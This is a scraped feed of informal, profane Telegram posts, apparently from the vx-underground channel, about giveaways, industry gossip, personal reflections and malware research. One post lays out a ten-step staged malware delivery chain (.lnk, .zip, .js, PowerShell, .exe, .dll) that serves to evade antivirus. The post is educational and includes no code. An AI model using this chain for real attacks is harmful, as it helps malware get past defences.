40630
The largest collection of malware source, samples, and papers on the internet. Password: infected https://vx-underground.org/
Dear Telegram nerds,
I've been AFK because it's been the holiday season. I've mostly been memeing to posts on Xitter. I'm not sure if any of you give a fuck, but tomorrow or Monday I'm doing a pseudo random giveaway thingie. I'm giving away $119,000 of cybersecurity courses. I'm gifting 400 people Cyber Warfare Live Infinity lab things.
https://x.com/vxunderground/status/1994830660704358684
Correction: 250,000+ upvotes.
If Xitter was a real place Tim Sweeney would be in serious trouble. After seeing this insane RATIO he probably wiped tears from his eyes with $100 bills while resting in his 5th Lamborghini
https://x.com/Bricker_Man/status/1994041026575798322
I was sitting here and I was like, "I wonder if any vendors have released any malware research papers? It's a major holiday in the United States, surely it's slowed down"
I check my MISP thingie and 27 papers released in the past 2 days
WHO ARE YOU PEOPLE
Big news for stinky nerds.
I've got a massive fuckin' giveaway. I've got a voucher for either a COMPTIA SEC+ or a ISC2 Systems Security Certified Practitioner (SSCP).
Both of these are great for your career.
But, I'm not going to give this shit away to some random fucking nerd in a comment section. This is the type of gift that could accelerate someones career and change someones life.
Some giveaways people burn, watch YouTube shorts, and shoot-the-shit with their friends on Discord calls like a bunch of bums. This is going to vetted. When I gift this to someone I expect them to follow through with it.
If you're gifted a career changing gift and you squander it I WILL lose my mind.
More information coming soon.
Some silly stuff happening this Thanksgiving.
Mixpanel, a company that lets your company perform analytics on your ChatGPT slop, has been compromised. However, because Mixpanel requires you having an OpenAI account, and does analysis on your ChatGPT slop, some media outlets are mischaracterizing it as an OpenAI compromise.
Mixpanel has stated several times this is NOT an OpenAI breach presumably because they don't want Sam Altman and his group of bazillbobillionaires to physically beat Mixpanel executives to death with a shovel
I haven't returned to the idea in so long I didn't realize these nerds kind of did it. It's not a full POC, but it's closed to what I've been toying with for awhile
https://www.praetorian.com/blog/leveraging-microsoft-text-services-framework-tsf-for-red-team-operations/
In like, 2020 I read this paper from 2006 about a malware keylogging idea. It was briefly discussed on forums and some cybersecurity conventions.
No one ever produced code for the idea.
Every few months I return back to the idea and poke around for a bit.
I have no idea why I've been obsessed with this idea for FIVE FUCKING YEARS. Regardless, today after poking around some more I think I finally figured it out.
Hi,
I will begin doing giveaways soon for the holiday season. This will be our third year doing giveaways.
This year I'll be giving away significantly less stuff because I have a baby and he doesn't respect anything except milk, food, pooping, and sleep.
Regardless, I still have lots of cool stuff to giveaway.
I'll be doing giveaways from cyberwarfarelab, CCGCyberWorld, HCAdamSec, ddd1ms, and some stuff from myself personally out-of-pocket. I forgot to harass more people for free stuff. I'm sure someone will come around.
For those new: each holiday season I giveaway a bunch of educational cybersecurity and/or information technology stuff. It's for anyone.
tl;dr cats r cool
Sometimes I still think about how zhangsansec hacked our website.
He found the silliest bug.
The bug allowed him to arbitrarily upload, download, edit, and delete files. He couldn't modify any website code, but he had the ability for a brief moment in time to destroy our entire archive.
When he discovered the exploit he notified us via DM. He didn't ask for anything in return. He didn't want a bug bounty. He shared his thoughts on where he believed the bug was on our side.
After he reported the vulnerability and confirmed we fixed it, ... he disappeared.
This guy is a fucking badass. Who the fuck was that absolute chad? Bro hacked our shit for the love of the game and as a meme ... then just left???
Might not work this week. In the United States it is a holiday called "Thanksgiving".
According to our educational institutions when we were like, 6 years old, Thanksgiving is a day which we celebrate the day English settlers and the indigenous Native Americans sat down and ate a lovely meal.
It is symbolic of unity of English settlers who escaped tyranny, or something, and then befriend the indigenous people of the Americas. It is a day we share thanks and give, or whatever.
We later learn this is romanticized and partially incorrect. We also later learn in our educational institutions what followed this lovely meal was famine, war, disease, and anything else horrible you can fathom.
Despite virtually every single person in the United States acknowledging this is a romanticized myth, we still celebrate it because its another reason to burn money and drive ourselves deeper in debt.
Following this, people do "Black Friday". Black Friday is a day where we worship our billionaire oligarchs and beg them for discounts and scraps of goods they no longer intend to sell at regular retail value.
Our billionaire overlords have been so pleased with this the "Black Friday" event has now been extended for several days, as long as a week by some retailers, to ensure maximum exploitation of not only consumers but seasonal employees.
My least favorite thing about doing malware stuff is the absolutely deranged malware conspiracy theories.
I can't tell if it's mental illness, or the result of being terminally online, or ignorance, or all of the above.
I get messages from people writing about cross-platform metamorphic multi-staged information stealers abusing 0day exploits in image compression software which is delivered from Bruce Springsteen eBay listings.
You need to get off the computer, dawg
Today an old acquaintance of mine died. Him and I were not close by any means. He was a family member of a friend.
As I get older in life the more dead people I know.
I've lost a lot of friends, family, and acquaintances over the past 3 decades.
A majority of the deaths have been due to the influence of drugs or alcohol.
I know many of you younger people think (whether you acknowledge it or not) that you're invincible or "it wouldn't happen to me", but I cannot stress this enough: don't fuck around with drugs or alcohol.
"So when the devil wants to dance with you, you better say never, because a dance with the devil might just last you forever"
Absolutely bloodbath on Xitter right now.
New changes have been pushed where you can now see the origins of someones account. Additionally, it flags if they suspect the person is using a VPN
Surprise Pikachu face, lots of people from India, Pakistan, and Indonesia impersonating Americans, Israelis, or Europeans to engagement bait for money.
Also, a surprisingly high amount of people who are heavily involved (commenting on) in United States politics who reside outside of the United States.
Funny stuff. Very silly.
tl;dr to kill Copilot forever just block copilot[.]microsoft[.]com
Читать полностью…
Thank you, young art student person place or thing.
It is very nice.
I didn't see the face behind everything originally because I don't have my glasses on (I'm old and stinky).
Post
See new posts
Conversation
vx-underground
@vxunderground
Big drama on the internet today (a very real and serious place)
On Steam video games that have used AI to aid in the assistance of the game are given a "made with AI" tag.
Tim Sweeney, CEO of Epic Games, thinks this is a poor decision and says they will not be doing this on their platform
As you could probably imagine, this has made gamers go fuckin spazzo on Epic Games. Gamers have concluded Steam has (once again) won the "battle" by doing nothing.
Mr. Sweeney was ruthlessly flamed on social media for it. Some reposts got as many as 150,000 upvotes.
Will this make Epic Games change their mind? Probably not, no
Is it fun to throw tomatoes at wealthy people, politicians, and large businesses? Yes
To the person who keeps sending me e-mails from the alleged compromised Papa Johns email,
I can't tell if you're memeing or not. You keep e-mailing journalists and stuff but the e-mail is flagged as failing domain authentication. I don't know what you're doing.
"SAM, I SWEAR I DIDNT SAY U WERE COMPROMISED. IM SORRY SAM, PLEASE DONT BREAK MY LEGS"
Читать полностью…
Letting bro hide until the coast is clear. Fuck the police
Читать полностью…
It's not even like, super cool or 1337. It's just something that's been bugging me for years. I was annoyed that no one produced code for it and I didn't get it working. It was like an itch I couldn't get to go away.
Читать полностью…
If you had to choose between never seeing your family ever again or never being able to get on the internet ever again
Which website would you visit once your family is gone forever
If you want to learn more about malware the easiest method is learning malware TTPs (Tactics Techniques and Procedures). Basically, understand some of the techniques employed by malware authors to do stuff
Some malware techniques are simple and old
Some malware techniques are incredibly sophisticated
What you'll notice though with malware TTPs is each TTP is a "stepping stone". For example, the most advanced evasion techniques often stem from the most basic of evasion techniques.
Research and improvements on malware don't come from nowhere. Each technique comes from standing (metaphorically) on the work of others.
Malware TTPs are broken down kind of subjectively. They're hard to categorize. MITRE is the industry standard for malware TTPs, but even then there is some debate on the effectiveness of it.
By effectiveness I mean, if you have a simple malware technique that is slightly modified, is it the same malware technique? Is it a whole new category? How many "modifications" until it has its own entry? It's just debating classification.
For Windows malware however malware is defined as something along the lines of:
1. How was it delivered to the machine?
2. How many "chains" or "stages" or "redirects" were performed until the payload was detonated?
3. How was the payload detonated?
4. Is the payload persistent?
5. What was the objective of the malware?
On missiles and stuff, the part that explodes is the payload. It is the same concept with malware. The actual malicious code that does the malicious stuff is the payload.
With chains, or redirects, or stages, ... modern malware is often not as simple as someone double clicking a .exe the payload detonates. While this is true for common malware, more sophisticated malware will often jump through a series of hoops until the actual payload is detonated.
For example, more sophisticated malware may send a malicious email attachment that is a .Lnk file (shortcut file). When the user double clicks the .Lnk file the .Lnk file may download a .zip file. The . Lnk file will extract the .zip which will contain a malicious .JS file. The .Lnk file will execute the .JS file.
The .JS file will delete the .Lnk and .zip. The .JS file with then generate a .PS1 script and execute it. The .PS1 file will delete the .JS file and download a .exe file. The .exe file then will download a .dll file. The .DLL is the payload.
1. Lnk downloads .zip
2. Lnk extracts zip
3. Lnk runs .JS
4. JS deletes .Lnk
5. JS deletes .zip
6. JS makes .ps1
7. ps1 downloads .exe
8. ps1 deletes .JS
9. .exe downloads .DLL
10. .exe runs .DLL payload
The reason malware does this is because it makes it difficult for anti virus software to identify the final payload. Researchers will need to reconstruct the series of events which lead to the payload delivery. Additionally, malware authors may modify the chaining at any given moment to make detection much more difficult.
Okay, that's enough schizo ranting for now.
SCHMEELLY I THINK THE GOVERNMENT PUT A RAT IN MY PHONE
Dawg, you play Diablo and piss in empty soda cans. The government does NOT give a fuck about you.
I cannot keep track of the number of deceased I know. It's pretty high and it grows each year.
Off the top of my head:
- 4 Dead from drunk driving
- 1 Overdose
- 3 Suicides (addicted to drugs)
- 2 Dead from medical complications from alcohol
Hello,
Soon I will be off-loading our vx-underground merch stuff to 1336_0ff_by_0ne.
1. Bradley primarily handled merchandise stuff. Unfortunately, Bradley isn't really around anymore due to sickness in his family. His Father is terminally ill (sort of, long story) and is working a full-time job while also simultaneously taking care of his Father. Bradley is a real muthafuckin G, works his fuckin' ass off, and takes care of his family. I love him.
2. I do malware paper collections, malware sample collections, social media posts, ... pretty much everything related to vx-underground. I also do weird dumb goofy shit like spend 16 hours poking Microsoft Copilot with a stick. I also (also) do this while working full-time and having a family. I do not possess the energy to deal with merchandise stuff.
3. 1336 0ff by 0ne is amazing. He does everything by hand (making the merchandise) and he also does the artwork by himself. He's a fucking genius and I love his work.
My plan is to basically off load all vx-underground merchandise to him with him keeping a majority of the profit and myself only getting some pennies, or something. Our current deal with Shopify doesn't give us shit anyway. We make like, $1 off a shirt. If we use 1336 0ff by 0ne then at least someone cool is making money and not some slimy fuck in a suit
Ideally, if I offload this merchandise stuff to 1336 0ff by 0ne we can have cool stuff happen such as:
1. I no longer have to deal with merchandise stuff, I'm busy
2. 1336 0ff by 0ne gets more business. We get some merchandise sales so hopefully people will think his merchandise is cool and badass and he makes some money too.
Look at his Emotet and Lockbit malwear* merchandise. It's cool and badass
yOurE nOt a ReAl pRoGraMmeR uNlEsS yOu knOw ASSemBly
1. It's an instruction set
2. It's illegal
3. It's for nerds
[continued]
I quickly realized though that if you go to
C:\Windows\System32\drivers\etc\hosts
... and make an entry that makes the Microsoft Copilot AI domain resolve to localhost, Copilot implodes and drops dead. It can no longer access any API endpoints hence it cannot exist.